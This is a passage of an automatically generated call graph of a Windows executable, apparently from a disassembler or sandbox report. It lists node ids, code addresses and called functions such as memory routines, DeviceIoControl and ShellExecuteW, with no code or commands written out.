21527->21529 21528 7ff7865e6ac1 21531 7ff7865e6af3 21528->21531 21532 7ff7865e6ae6 free 21528->21532 21529->21528 21530 7ff7865e6ab4 free 21529->21530 21530->21528 21533 7ff7865e6b25 21531->21533 21534 7ff7865e6b18 free 21531->21534 21532->21531 21535 7ff7865e6b57 21533->21535 21536 7ff7865e6b4a free 21533->21536 21534->21533 23187 7ff7865fba00 21535->23187 21536->21535 21539 7ff7865e6b95 21541 7ff7865e6bc7 21539->21541 21543 7ff7865e6bba free 21539->21543 21540 7ff7865e6b88 free 21540->21539 21542 7ff7865e6bf9 21541->21542 21544 7ff7865e6bec free 21541->21544 21545 7ff7865e6c1e free 21542->21545 21550 7ff7865e6c2b 21542->21550 21543->21541 21544->21542 21545->21550 21546 7ff7865e6c76 21550->21546 21554 7ff7865e6c62 free 21550->21554 21554->21550 21556->20642 21558 7ff7865f3b00 21556->21558 21559 7ff7865f3b32 21558->21559 21560 7ff7865f3b19 free 21558->21560 21562 7ff7865f3b57 21559->21562 21563 7ff7865f3b50 free 21559->21563 21560->21559 21564 7ff7865f3b7c 21562->21564 21565 7ff7865f3b75 free 21562->21565 21563->21562 21566 7ff7865f3ba1 21564->21566 21567 7ff7865f3b9a free 21564->21567 21565->21564 21568 7ff7865f3bc6 21566->21568 21569 7ff7865f3bbf free 21566->21569 21567->21566 21570 7ff7866010c0 3 API calls 21568->21570 21569->21568 21571 7ff7865f3bd2 21570->21571 21572 7ff7865f3bf8 21571->21572 21573 7ff7865f3bf1 free 21571->21573 21574 7ff7865f3c1d 21572->21574 21575 7ff7865f3c16 free 21572->21575 21573->21572 21576 7ff7865f3c42 21574->21576 21577 7ff7865f3c3b free 21574->21577 21575->21574 23252 7ff7865e1d40 21576->23252 21577->21576 21580 7ff7865f3c74 21582 7ff7865f3c99 21580->21582 21583 7ff7865f3c92 free 21580->21583 21581 7ff7865f3c6d free 21581->21580 23260 7ff7865f3720 21582->23260 21583->21582 21586 7ff7865f3cc4 free 21589 7ff7865f3ccb 21586->21589 21587 7ff7865f3d15 21592 7ff7865e12a0 16 API calls 21587->21592 21588 7ff7865f3cf0 21588->21587 21591 7ff7865f3d0e free 21588->21591 21589->21588 21590 7ff7865f3ce9 free 21589->21590 21590->21588 21591->21587 21594 7ff7865f3d21 21592->21594 21593 7ff7865f3d91 21594->21593 21595 7ff7865f3d8a free 21594->21595 21595->21593 21615 7ff7865ff946 21614->21615 21616 7ff7865ff981 21614->21616 21669 7ff786602bf0 21615->21669 21617 7ff7865ff9bc 21616->21617 21619 7ff7865ff9b6 free 21616->21619 21620 7ff7865ff9d7 free 21617->21620 21624 7ff7865ff9dd malloc 21617->21624 21619->21617 21620->21624 21622 7ff7865ffad6 malloc 21627 7ff7865ffaf3 21622->21627 21640 7ff78660010f 21622->21640 21623 7ff7865ffad0 21623->21622 21624->21622 21624->21623 21625 7ff7866009f5 free 21662 7ff7866009c0 21625->21662 21626 7ff78662c970 8 API calls 21628 7ff786600a0c 21626->21628 21627->21640 21676 7ff786600a40 21627->21676 21628->20965 21632 7ff7865ffbed malloc 21634 7ff7865ffc44 malloc 21632->21634 21635 7ff7865ffc3e 21632->21635 21637 7ff7865ffc61 21634->21637 21638 7ff7865ffc67 malloc memset memset memset 21634->21638 21635->21634 21636 7ff7865ffb95 21636->21632 21636->21640 21687 7ff7865f4fc0 21636->21687 21637->21638 21642 7ff78660013b malloc memset 21638->21642 21644 7ff7865ffcc1 21638->21644 21640->21625 21640->21662 21647 7ff786600393 free 21642->21647 21663 7ff786600200 21642->21663 21644->21642 21644->21644 21693 7ff7865fa590 21644->21693 21697 7ff7865f44b0 21644->21697 21648 7ff7866003c5 21647->21648 21649 7ff7866003d7 free 21647->21649 21648->21649 21650 7ff7866003fb free 21649->21650 21652 7ff7866003e9 21649->21652 21654 7ff7866007eb free 21650->21654 21667 7ff786600429 21650->21667 21652->21650 21655 7ff786600854 free 21654->21655 21656 7ff786600842 21654->21656 21658 7ff786600875 free 21655->21658 21659 7ff786600863 21655->21659 21656->21655 21661 7ff786600883 21658->21661 21659->21658 21660 7ff7866010c0 3 API calls 21660->21667 21664 7ff786600979 21661->21664 21665 7ff786601530 3 API calls 21661->21665 21662->21626 21663->21647 21663->21663 21704 7ff7865fa800 21663->21704 21664->21662 21666 7ff786601180 11 API calls 21664->21666 21665->21661 21666->21664 21667->21654 21667->21660 21718 7ff786601180 21667->21718 21728 7ff786601530 21667->21728 21670 7ff786602c12 21669->21670 21672 7ff786602c91 21669->21672 21671 7ff786602c48 malloc 21670->21671 21670->21672 21671->21672 21673 7ff786602c61 memcpy 21671->21673 21672->21616 21674 7ff786602c8b free 21673->21674 21675 7ff786602c79 21673->21675 21674->21672 21675->21674 21677 7ff786600aa4 memset 21676->21677 21678 7ff786600a72 21676->21678 21679 7ff786600abe 21677->21679 21678->21677 21681 7ff786600a94 malloc 21678->21681 21680 7ff7865f44b0 3 API calls 21679->21680 21682 7ff786600b0c 21680->21682 21681->21677 21683 7ff786600b78 21682->21683 21684 7ff786600b6e free 21682->21684 21685 7ff78662c970 8 API calls 21683->21685 21684->21683 21686 7ff7865ffb5c malloc 21685->21686 21686->21632 21686->21636 21690 7ff7865f5031 21687->21690 21688 7ff78662c970 8 API calls 21689 7ff7865f5468 21688->21689 21689->21636 21692 7ff7865f52b0 21690->21692 21731 7ff7865f4e50 21690->21731 21692->21688 21694 7ff7865fa7ac 21693->21694 21695 7ff7865fa5be 21693->21695 21694->21644 21695->21694 21735 7ff7865f81f0 21695->21735 21698 7ff7865f44ef qsort 21697->21698 21699 7ff7865f44dd 21697->21699 21700 7ff7865f46d7 qsort 21698->21700 21703 7ff7865f4514 21698->21703 21699->21698 21700->21644 21701 7ff7865f4666 qsort 21702 7ff7865f4690 21701->21702 21702->21644 21703->21701 21705 7ff7865fae5d 21704->21705 21708 7ff7865fa85e 21704->21708 21706 7ff78662c970 8 API calls 21705->21706 21707 7ff7865faef1 21706->21707 21707->21663 21708->21705 21709 7ff7865f81f0 12 API calls 21708->21709 21711 7ff7865facc7 free 21708->21711 21716 7ff7865fac88 free 21708->21716 21717 7ff7865faca3 free 21708->21717 21747 7ff7865f80f0 21708->21747 21755 7ff7865f9c40 21708->21755 21767 7ff7865f9250 21708->21767 21775 7ff7865fa040 21708->21775 21781 7ff7865fa2f0 21708->21781 21709->21708 21711->21708 21716->21708 21716->21717 21717->21708 21719 7ff7866011aa 21718->21719 21720 7ff7866011f1 21719->21720 21721 7ff7866011e3 free 21719->21721 21722 7ff78660121e 21720->21722 21723 7ff786601214 free 21720->21723 21721->21720 21834 7ff786601450 21722->21834 21723->21722 21727 7ff7866012d8 21727->21667 21729 7ff786602b00 3 API calls 21728->21729 21730 7ff786601563 21729->21730 21730->21667 21732 7ff7865f4e9a 21731->21732 21733 7ff78662c970 8 API calls 21732->21733 21734 7ff7865f4f9f 21733->21734 21734->21692 21736 7ff7865f8255 21735->21736 21737 7ff7865f8336 floorf 21736->21737 21738 7ff7865f8358 21736->21738 21741 7ff7865f83ce 21736->21741 21737->21738 21739 7ff7865f8366 floorf 21738->21739 21740 7ff7865f8385 21738->21740 21739->21740 21742 7ff7865f83ab 21740->21742 21743 7ff7865f838a ceilf 21740->21743 21745 7ff78662c970 8 API calls 21741->21745 21742->21741 21744 7ff7865f83b0 ceilf 21742->21744 21743->21742 21744->21741 21746 7ff7865f83e3 21745->21746 21746->21695 21748 7ff7865f8125 21747->21748 21749 7ff7865f811b 21747->21749 21751 7ff7865f8120 21748->21751 21753 7ff7865f8192 malloc 21748->21753 21787 7ff7865f5df0 21749->21787 21752 7ff78662c970 8 API calls 21751->21752 21754 7ff7865f81dc 21752->21754 21753->21751 21754->21708 21756 7ff7865f9cae 21755->21756 21757 7ff7865f9cf3 malloc 21756->21757 21761 7ff7865f9d09 21756->21761 21757->21761 21765 7ff7865f9d14 21757->21765 21758 7ff78662c970 8 API calls 21759 7ff7865f9fdc 21758->21759 21759->21708 21760 7ff7865f9d67 malloc 21762 7ff7865f9ffc free 21760->21762 21760->21765 21761->21758 21763 7ff7865fa020 free 21762->21763 21764 7ff7865fa00e 21762->21764 21763->21761 21764->21763 21765->21760 21765->21761 21807 7ff7865f97a0 21765->21807 21770 7ff7865f928e 21767->21770 21768 7ff7865f9343 malloc 21769 7ff7865f9598 21768->21769 21772 7ff7865f9364 21768->21772 21769->21708 21770->21768 21770->21770 21821 7ff7865f8ba0 21772->21821 21776 7ff7865fa049 21775->21776 21780 7ff7865fa2df 21775->21780 21777 7ff7865fa0a0 memset 21776->21777 21778 7ff7865fa2c3 21776->21778 21777->21776 21779 7ff78662c970 8 API calls 21778->21779 21779->21780 21780->21708 21782 7ff7865fa2f8 21781->21782 21786 7ff7865fa579 21781->21786 21783 7ff7865fa340 memset 21782->21783 21784 7ff7865fa562 21782->21784 21783->21782 21785 7ff78662c970 8 API calls 21784->21785 21785->21786 21786->21708 21788 7ff7865f5e7d 21787->21788 21789 7ff7865f5eb2 malloc 21788->21789 21793 7ff7865f5f41 21788->21793 21806 7ff7865f62a8 21788->21806 21789->21793 21790 7ff78662c970 8 API calls 21792 7ff7865f6a94 21790->21792 21792->21751 21793->21790 21794 7ff7865f64c4 sqrtf 21794->21806 21795 7ff7865f64f7 sqrtf 21795->21806 21796 7ff7865f80f0 9 API calls 21796->21806 21797 7ff7865f698f malloc 21798 7ff7865f6a3d 21797->21798 21797->21806 21799 7ff7865f6a5d 21798->21799 21802 7ff7865f6a54 free 21798->21802 21799->21793 21803 7ff7865f6a7c free 21799->21803 21800 7ff7865f69c2 memcpy 21800->21806 21801 7ff7865f69b0 memcpy 21801->21800 21802->21799 21803->21793 21804 7ff7865f69f4 free 21804->21806 21805 7ff7865f6a1f free 21805->21806 21806->21793 21806->21794 21806->21795 21806->21796 21806->21797 21806->21800 21806->21801 21806->21804 21806->21805 21808 7ff7865f9886 21807->21808 21809 7ff7865f988f sqrtf 21807->21809 21810 7ff7865f98b2 21808->21810 21811 7ff7865f98bc sqrtf 21808->21811 21809->21808 21812 7ff7865f98e1 21810->21812 21813 7ff7865f98eb sqrtf 21810->21813 21811->21810 21814 7ff7865f9917 sqrtf 21812->21814 21819 7ff7865f990e 21812->21819 21813->21812 21814->21819 21822 7ff7865f8c05 malloc 21821->21822 21833 7ff7865f8c30 21821->21833 21822->21833 21824 7ff7865f8cf5 memset memset 21824->21833 21825 7ff7865f8f6f 21827 7ff7865f9005 free 21825->21827 21830 7ff7865f9016 21825->21830 21826 7ff7865f9050 21829 7ff78662c970 8 API calls 21826->21829 21827->21825 21827->21830 21828 7ff7865f9047 free 21828->21826 21830->21826 21830->21828 21832 7ff7865f8dc6 malloc 21832->21833 21833->21824 21833->21825 21833->21832 21835 7ff786601466 21834->21835 21839 7ff78660122e 21834->21839 21837 7ff7866014ad 21835->21837 21849 7ff7865f3690 21835->21849 21838 7ff7865f38c0 3 API calls 21837->21838 21837->21839 21838->21839 21839->21727 21840 7ff786602b00 21839->21840 21841 7ff786602bda 21840->21841 21842 7ff786602b1a 21840->21842 21841->21727 21843 7ff786602bc8 21842->21843 21844 7ff786602b59 malloc 21842->21844 21843->21727 21850 7ff7865f36a5 malloc 21849->21850 21851 7ff7865f3705 21849->21851 21850->21851 21853 7ff7865f36d5 memcpy 21850->21853 21851->21837 21857 7ff786612eed 21856->21857 21858 7ff786612e3d 21856->21858 21859 7ff78662c970 8 API calls 21857->21859 21858->21857 21861 7ff786612e70 DeviceIoControl 21858->21861 21860 7ff786612efd 21859->21860 21860->20986 21862 7ff78662c970 8 API calls 21861->21862 21863 7ff786612ee5 21862->21863 21863->20986 21865 7ff78662a268 21864->21865 21867 7ff78662a1b9 21864->21867 21866 7ff78662c970 8 API calls 21865->21866 21868 7ff78662a278 21866->21868 21867->21865 21869 7ff78662a1ec DeviceIoControl 21867->21869 21868->20989 21870 7ff78662c970 8 API calls 21869->21870 21871 7ff78662a260 21870->21871 21871->20989 21873 7ff78662a169 21872->21873 21876 7ff78662a0b9 21872->21876 21874 7ff78662c970 8 API calls 21873->21874 21875 7ff78662a179 21874->21875 21875->20991 21876->21873 21877 7ff78662a0ec DeviceIoControl 21876->21877 21878 7ff78662c970 8 API calls 21877->21878 21879 7ff78662a161 21878->21879 21879->20991 21881 7ff78662a3bd 21880->21881 21882 7ff78662a462 21880->21882 21881->21882 21885 7ff78662a3f0 DeviceIoControl 21881->21885 21883 7ff78662c970 8 API calls 21882->21883 21884 7ff78661de4b 21883->21884 21884->20994 21885->21882 21887 7ff78661240d 21886->21887 21888 7ff78661235d 21886->21888 21889 7ff78662c970 8 API calls 21887->21889 21888->21887 21891 7ff786612390 DeviceIoControl 21888->21891 21890 7ff78661241d 21889->21890 21890->20999 21892 7ff78662c970 8 API calls 21891->21892 21893 7ff786612405 21892->21893 21893->20999 21941 7ff786629700 21940->21941 21941->21941 21942 7ff78662971d 21941->21942 21943 7ff786629804 21941->21943 21944 7ff786629728 memcpy 21942->21944 21949 7ff786629749 21942->21949 22025 7ff786611400 ?_Xlength_error@std@@YAXPEBD __std_exception_copy 21943->22025 21946 7ff786612975 21944->21946 21946->21075 21959 7ff78662bc70 21946->21959 21947 7ff786629809 21950 7ff786611360 Concurrency::cancel_current_task __std_exception_copy 21947->21950 21948 7ff7866297c7 21953 7ff78662cfb4 std::_Facet_Register 4 API calls 21948->21953 21949->21947 21949->21948 21951 7ff786629786 memcpy 21949->21951 21954 7ff786629779 21949->21954 21955 7ff78662980f 21950->21955 21951->21946 21953->21951 21956 7ff78662cfb4 std::_Facet_Register 4 API calls 21954->21956 21957 7ff786629781 21956->21957 21957->21951 21958 7ff7866297c0 _invalid_parameter_noinfo_noreturn 21957->21958 21958->21948 21960 7ff78662bc99 21959->21960 21961 7ff78662bcb2 21959->21961 21960->21080 21962 7ff78662bcc8 21961->21962 21963 7ff78662bd8f 21961->21963 21964 7ff78662bcce memcpy 21962->21964 21969 7ff78662bcf4 21962->21969 22026 7ff786611400 ?_Xlength_error@std@@YAXPEBD __std_exception_copy 21963->22026 21964->21080 21966 7ff78662bd00 21971 7ff78662cfb4 std::_Facet_Register 4 API calls 21966->21971 21967 7ff78662bd94 21972 7ff786611360 Concurrency::cancel_current_task __std_exception_copy 21967->21972 21968 7ff78662bd64 memcpy 21968->21080 21969->21966 21969->21967 21969->21968 21970 7ff78662bd5c 21969->21970 21973 7ff78662cfb4 std::_Facet_Register 4 API calls 21970->21973 21974 7ff78662bd16 21971->21974 21975 7ff78662bd9a 21972->21975 21976 7ff78662bd1b 21973->21976 21974->21976 21977 7ff78662bd55 _invalid_parameter_noinfo_noreturn 21974->21977 21976->21968 21977->21970 21979 7ff78662a6ee 21978->21979 21985 7ff78662a6e7 21978->21985 21980 7ff78662a7d3 21979->21980 21984 7ff78662a707 21979->21984 22027 7ff786611400 ?_Xlength_error@std@@YAXPEBD __std_exception_copy 21980->22027 21982 7ff78662a718 21986 7ff78662cfb4 std::_Facet_Register 4 API calls 21982->21986 21983 7ff78662a7d8 21988 7ff786611360 Concurrency::cancel_current_task __std_exception_copy 21983->21988 21984->21982 21984->21983 21984->21985 21987 7ff78662a777 21984->21987 21985->21085 21985->21985 21989 7ff78662a731 21986->21989 21991 7ff78662cfb4 std::_Facet_Register 4 API calls 21987->21991 21990 7ff78662a7de 21988->21990 21989->21985 21991->21985 21994 7ff786629ee2 21993->21994 21995 7ff786629ea3 memcpy 21993->21995 22028 7ff78662b8d0 21994->22028 21995->21091 22025->21947 22026->21967 22027->21983 22051 7ff78662ca4e 22050->22051 22052 7ff78662ca53 ReleaseSRWLockExclusive 22051->22052 22054 7ff78662ca58 SleepConditionVariableSRW 22051->22054 22054->22051 22056 7ff78662b228 22055->22056 22057 7ff78662b22d 22055->22057 22056->22057 22058 7ff78662b231 memchr 22056->22058 22057->21139 22058->22057 22059 7ff78662b255 22058->22059 22060 7ff78662b260 memcmp 22059->22060 22060->22057 22061 7ff78662b272 memchr 22060->22061 22061->22057 22061->22060 22064 7ff7865ecaed 22063->22064 22065 7ff7865f3400 3 API calls 22064->22065 22066 7ff7865ecb25 22065->22066 22333 7ff7865fc050 22066->22333 22334 7ff7865fc072 22333->22334 22335 7ff7865fc09f 22333->22335 22336 7ff7865f3280 3 API calls 22334->22336 22336->22335 23057 7ff7865f1602 23056->23057 23061 7ff7865f17ff 23056->23061 23058 7ff7865ecc60 3 API calls 23057->23058 23062 7ff7865f16fd 23058->23062 23059 7ff7865f17f5 23060 7ff7865ec6f0 41 API calls 23059->23060 23060->23061 23061->21464 23062->23059 23063 7ff78660d850 45 API calls 23062->23063 23063->23062 23065 7ff7865f1f05 free 23064->23065 23066 7ff7865f1f1f 23064->23066 23065->23066 23066->21469 23068 7ff7865ed822 23067->23068 23069 7ff7865ed829 23067->23069 23086 7ff7865ed5c0 23068->23086 23097 7ff7865ed6c0 23069->23097 23072 7ff7865ed827 23073 7ff786604140 28 API calls 23072->23073 23074 7ff7865ed83b 23073->23074 23075 7ff7865ec6f0 41 API calls 23074->23075 23076 7ff7865ed840 23075->23076 23076->21462 23078 7ff7865ec7c0 2 API calls 23077->23078 23079 7ff7865e52b9 23078->23079 23079->21472 23081 7ff7865eda57 23080->23081 23083 7ff7865edb66 23080->23083 23082 7ff7865ec7c0 2 API calls 23081->23082 23081->23083 23084 7ff7865edb2d 23082->23084 23083->21461 23084->23083 23085 7ff7865f3820 3 API calls 23084->23085 23085->23083 23087 7ff7865ed67a 23086->23087 23088 7ff7865ed5e8 23086->23088 23089 7ff7865e2470 __stdio_common_vsprintf 23087->23089 23090 7ff7865ed6c0 9 API calls 23088->23090 23091 7ff7865ed697 23089->23091 23092 7ff7865ed668 23090->23092 23095 7ff78662c970 8 API calls 23091->23095 23093 7ff78662c970 8 API calls 23092->23093 23094 7ff7865ed675 23093->23094 23094->23072 23096 7ff7865ed6b6 23095->23096 23096->23072 23098 7ff7865e2470 __stdio_common_vsprintf 23097->23098 23102 7ff7865ed700 23098->23102 23099 7ff7865ed7be 23100 7ff78662c970 8 API calls 23099->23100 23101 7ff7865ed7dd 23100->23101 23101->23072 23102->23099 23103 7ff7865e2470 __stdio_common_vsprintf 23102->23103 23103->23099 23105 7ff7865f33de 23104->23105 23108 7ff7865f332a 23104->23108 23105->21477 23106 7ff7865f33cc 23106->21477 23107 7ff7865f3365 malloc 23109 7ff7865f33ae 23107->23109 23110 7ff7865f337e memcpy 23107->23110 23108->23106 23108->23107 23109->21477 23111 7ff7865f3396 23110->23111 23112 7ff7865f33a8 free 23110->23112 23111->23112 23112->23109 23114 7ff7865e6ea9 23113->23114 23116 7ff7865e6f00 23113->23116 23114->23116 23118 7ff7865f3280 3 API calls 23114->23118 23115 7ff7865e6f50 23115->21489 23116->23115 23117 7ff7865e6e80 3 API calls 23116->23117 23117->23116 23118->23116 23120 7ff786602522 23119->23120 23121 7ff78660210a 23119->23121 23120->21493 23123 7ff7865fc050 3 API calls 23121->23123 23140 7ff7866024c6 23121->23140 23122 7ff78662c970 8 API calls 23122->23120 23124 7ff786602272 23123->23124 23125 7ff7866022d1 23124->23125 23126 7ff7865fc050 3 API calls 23124->23126 23127 7ff7865fc350 6 API calls 23125->23127 23126->23125 23128 7ff7866022f7 23127->23128 23129 7ff78660237e 23128->23129 23130 7ff7865fc050 3 API calls 23128->23130 23131 7ff7865fc350 6 API calls 23129->23131 23130->23129 23132 7ff7866023a4 23131->23132 23133 7ff786602413 23132->23133 23134 7ff7865fc050 3 API calls 23132->23134 23135 7ff7865fc350 6 API calls 23133->23135 23134->23133 23136 7ff786602439 23135->23136 23137 7ff7866024a0 23136->23137 23138 7ff7865fc050 3 API calls 23136->23138 23139 7ff7865fc350 6 API calls 23137->23139 23138->23137 23139->23140 23140->23122 23206 7ff7865feb20 23141->23206 23144 7ff7865fe9f1 23146 7ff7865fea0c free 23144->23146 23151 7ff7865fea12 23144->23151 23145 7ff7865fe9eb free 23145->23144 23146->23151 23147 7ff7865fea6a 23148 7ff7865fea93 23147->23148 23149 7ff7865fea89 free 23147->23149 23150 7ff7865feab8 23148->23150 23152 7ff7865feaae free 23148->23152 23149->23148 23154 7ff7865fead3 free 23150->23154 23158 7ff7865feada 23150->23158 23151->23147 23156 7ff7865fea56 free 23151->23156 23214 7ff786601040 23151->23214 23152->23150 23154->23158 23155 7ff7865e683b free 23155->21508 23156->23151 23157 7ff7865feaf4 free 23157->23155 23158->23155 23158->23157 23160 7ff7865f25f4 23159->23160 23167 7ff7865f26e5 23159->23167 23161 7ff7865f3600 3 API calls 23160->23161 23162 7ff7865f262a 23160->23162 23161->23162 23163 7ff7865f3600 3 API calls 23162->23163 23166 7ff7865f263e 23162->23166 23163->23166 23164 7ff7865e2650 11 API calls 23165 7ff7865f26c0 23164->23165 23165->23167 23168 7ff7865f26c8 fwrite fclose 23165->23168 23166->23164 23167->21505 23168->23167 23170 7ff7865f3a99 23169->23170 23171 7ff7865f3959 23169->23171 23170->21505 23172 7ff7865f398b free 23171->23172 23175 7ff7865f3991 23171->23175 23172->23175 23173 7ff7865f39e4 23223 7ff7865e12a0 23173->23223 23175->23173 23177 7ff7865f39cf free 23175->23177 23177->23175 23178 7ff7865f3a12 23180 7ff7865f3a37 23178->23180 23182 7ff7865f3a30 free 23178->23182 23179 7ff7865f3a0b free 23179->23178 23181 7ff7865f3a5c 23180->23181 23183 7ff7865f3a55 free 23180->23183 23240 7ff7865e47c0 23181->23240 23182->23180 23183->23181 23188 7ff7865fba1c free 23187->23188 23189 7ff7865fba3b 23187->23189 23188->23189 23191 7ff7865fba64 23189->23191 23192 7ff7865fba5a free 23189->23192 23193 7ff7865fba83 free 23191->23193 23194 7ff7865fba8d 23191->23194 23192->23191 23193->23194 23195 7ff7865fbab8 free 23194->23195 23197 7ff7865fbac2 23194->23197 23195->23197 23196 7ff7865fbae1 free 23198 7ff7865fbaeb 23196->23198 23197->23196 23197->23198 23199 7ff7865fbb10 free 23198->23199 23204 7ff7865fbb1d 23198->23204 23199->23204 23200 7ff7865fbbe3 23201 7ff7865e6b63 23200->23201 23202 7ff7865fbc1c free 23200->23202 23201->21539 23201->21540 23202->23201 23203 7ff7865fbb94 free 23203->23204 23204->23200 23204->23203 23205 7ff7865fbbc7 free 23204->23205 23205->23204 23207 7ff7865feb40 23206->23207 23210 7ff7865feb92 23206->23210 23207->23210 23213 7ff7865feb76 free 23207->23213 23208 7ff7865fe9d0 23208->23144 23208->23145 23209 7ff7865fec23 23209->23208 23212 7ff7865fec42 free 23209->23212 23210->23209 23211 7ff7865fec19 free 23210->23211 23211->23209 23212->23208 23213->23207 23215 7ff7866010c0 3 API calls 23214->23215 23216 7ff78660104e 23215->23216 23217 7ff786601071 23216->23217 23218 7ff78660106a free 23216->23218 23219 7ff78660108c free 23217->23219 23221 7ff786601093 23217->23221 23218->23217 23219->23221 23220 7ff7866010b5 23220->23151 23221->23220 23222 7ff7866010ae free 23221->23222 23222->23220 23224 7ff7865fba00 9 API calls 23223->23224 23225 7ff7865e12ae 23224->23225 23226 7ff7865e12cd free 23225->23226 23228 7ff7865e12d4 23225->23228 23226->23228 23227 7ff7865e12f2 free 23229 7ff7865e12f9 23227->23229 23228->23227 23228->23229 23230 7ff7865e131b 23229->23230 23231 7ff7865e1314 free 23229->23231 23232 7ff7865e133d 23230->23232 23233 7ff7865e1336 free 23230->23233 23231->23230 23234 7ff7865e135f 23232->23234 23235 7ff7865e1358 free 23232->23235 23233->23232 23236 7ff7865e1381 23234->23236 23237 7ff7865e137a free 23234->23237 23235->23234 23238 7ff7865e13a3 23236->23238 23239 7ff7865e139c free 23236->23239 23237->23236 23238->23178 23238->23179 23239->23238 23241 7ff7865e47ee 23240->23241 23242 7ff7865e47d5 free 23240->23242 23244 7ff7865e4813 23241->23244 23245 7ff7865e480c free 23241->23245 23242->23241 23246 7ff7865e4838 23244->23246 23247 7ff7865e4831 free 23244->23247 23245->23244 23248 7ff7865e485d 23246->23248 23249 7ff7865e4856 free 23246->23249 23247->23246 23250 7ff7865e4882 free 23248->23250 23251 7ff7865e487b free 23248->23251 23249->23248 23250->23170 23251->23250 23253 7ff7865e1d52 free 23252->23253 23254 7ff7865e1d6b 23252->23254 23253->23254 23256 7ff7865e1d8d 23254->23256 23258 7ff7865e1d86 free 23254->23258 23257 7ff7865e1daf 23256->23257 23259 7ff7865e1da8 free 23256->23259 23257->21580 23257->21581 23258->23256 23259->23257 23262 7ff7865f374a 23260->23262 23263 7ff7865f379b 23260->23263 23261 7ff7865f37d1 23265 7ff7865f37fa 23261->23265 23267 7ff7865f37f1 free 23261->23267 23262->23263 23266 7ff7865f3788 free 23262->23266 23263->23261 23264 7ff7865f37c7 free 23263->23264 23264->23261 23265->21586 23265->21589 23266->23262 23267->23265 23269 7ff78662cf5a RtlLookupFunctionEntry 23268->23269 23270 7ff78662ce97 23269->23270 23271 7ff78662cf70 RtlVirtualUnwind 23269->23271 23272 7ff78662ce38 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23270->23272 23271->23269 23271->23270 23273 7ff78662c2e0 23274 7ff78662c360 23273->23274 23274->23274 23275 7ff78662c370 system 23274->23275 23276 7ff78662c3c5 23275->23276 23276->23276 23303 7ff78662da00 ___lc_codepage_func 23276->23303 23283 7ff78662c443 23284 7ff78662c580 system 23283->23284 23288 7ff78662c4ea ShellExecuteW 23283->23288 23290 7ff78662c650 23284->23290 23285 7ff78662c43e 23287 7ff78662cdc0 free 23285->23287 23286 7ff78662c437 _invalid_parameter_noinfo_noreturn 23286->23285 23287->23283 23288->23284 23290->23290 23291 7ff78662da00 __std_fs_code_page 2 API calls 23290->23291 23292 7ff78662c663 23291->23292 23293 7ff786616b50 25 API calls 23292->23293 23294 7ff78662c67e 23293->23294 23295 7ff786617630 31 API calls 23294->23295 23296 7ff78662c688 23295->23296 23297 7ff78662c6ce 23296->23297 23299 7ff78662c6c9 23296->23299 23300 7ff78662c6c2 _invalid_parameter_noinfo_noreturn 23296->23300 23298 7ff78662c7ef Sleep 23297->23298 23302 7ff78662c759 ShellExecuteW 23297->23302 23301 7ff78662cdc0 free 23299->23301 23300->23299 23301->23297 23302->23298 23304 7ff78662c3d8 23303->23304 23305 7ff78662da13 AreFileApisANSI 23303->23305 23306 7ff786616b50 23304->23306 23305->23304 23307 7ff786616ba7 23306->23307 23308 7ff786616c81 23306->23308 23309 7ff786616ca7 23307->23309 23328 7ff78662da28 MultiByteToWideChar 23307->23328 23321 7ff786617630 23308->23321 23355 7ff786611790 23309->23355 23312 7ff786616cad 23313 7ff786611a70 12 API calls 23312->23313 23315 7ff786616cb9 23313->23315 23317 7ff786616be5 23318 7ff78662da28 __std_fs_convert_narrow_to_wide 2 API calls 23317->23318 23319 7ff786616c76 23318->23319 23319->23308 23351 7ff786611a70 23319->23351 23322 7ff78661764f 23321->23322 23369 7ff78662db3c 23322->23369 23325 7ff786617721 23326 7ff78662c970 8 API calls 23327 7ff786617714 23326->23327 23327->23283 23327->23285 23327->23286 23329 7ff786616bca 23328->23329 23330 7ff78662da52 GetLastError 23328->23330 23329->23312 23329->23317 23331 7ff78662b410 23329->23331 23330->23329 23332 7ff78662b5b6 23331->23332 23335 7ff78662b43f 23331->23335 23359 7ff786611400 ?_Xlength_error@std@@YAXPEBD __std_exception_copy 23332->23359 23334 7ff78662b5bb 23340 7ff786611360 Concurrency::cancel_current_task __std_exception_copy 23334->23340 23335->23334 23336 7ff78662b4ed 23335->23336 23337 7ff78662b4c1 23335->23337 23343 7ff78662b4a5 23335->23343 23339 7ff78662cfb4 std::_Facet_Register 4 API calls 23336->23339 23337->23334 23338 7ff78662b4ce 23337->23338 23341 7ff78662cfb4 std::_Facet_Register 4 API calls 23338->23341 23339->23343 23342 7ff78662b5c1 23340->23342 23341->23343 23344 7ff78662b56d memcpy 23343->23344 23345 7ff78662b50d memcpy 23343->23345 23347 7ff78662b566 _invalid_parameter_noinfo_noreturn 23343->23347 23346 7ff78662b564 23344->23346 23348 7ff78662b520 23345->23348 23346->23317 23347->23344 23348->23347 23349 7ff78662b559 23348->23349 23350 7ff78662cdc0 free 23349->23350 23350->23346 23352 7ff786611a80 23351->23352 23360 7ff7866116a0 23352->23360 23356 7ff78661179e 23355->23356 23357 7ff7866116a0 11 API calls 23356->23357 23358 7ff7866117b5 _CxxThrowException __std_exception_copy 23357->23358 23358->23312 23359->23334 23361 7ff7866116d6 __std_exception_copy 23360->23361 23362 7ff78661175a 23361->23362 23363 7ff786611725 23361->23363 23364 7ff78662c970 8 API calls 23362->23364 23365 7ff786611755 23363->23365 23367 7ff78661174e _invalid_parameter_noinfo_noreturn 23363->23367 23366 7ff78661177b _CxxThrowException 23364->23366 23368 7ff78662cdc0 free 23365->23368 23367->23365 23368->23362 23373 7ff78662db7e 23369->23373 23370 7ff78662db87 23371 7ff78662c970 8 API calls 23370->23371 23374 7ff786617668 23371->23374 23372 7ff78662dc99 23407 7ff78662de64 CreateFileW 23372->23407 23373->23370 23373->23372 23376 7ff78662dbdf GetFileAttributesExW 23373->23376 23374->23325 23374->23326 23378 7ff78662dbf3 GetLastError 23376->23378 23379 7ff78662dc44 23376->23379 23378->23370 23380 7ff78662dc02 FindFirstFileW 23378->23380 23379->23370 23379->23372 23383 7ff78662dc21 FindClose 23380->23383 23384 7ff78662dc16 GetLastError 23380->23384 23381 7ff78662dce2 23387 7ff78662dcf1 GetFileInformationByHandleEx 23381->23387 23388 7ff78662dd93 23381->23388 23382 7ff78662dcc2 23385 7ff78662dccd CloseHandle 23382->23385 23386 7ff78662dcdb 23382->23386 23383->23379 23384->23370 23385->23386 23389 7ff78662de54 abort 23385->23389 23386->23370 23392 7ff78662dd0b GetLastError 23387->23392 23393 7ff78662dd34 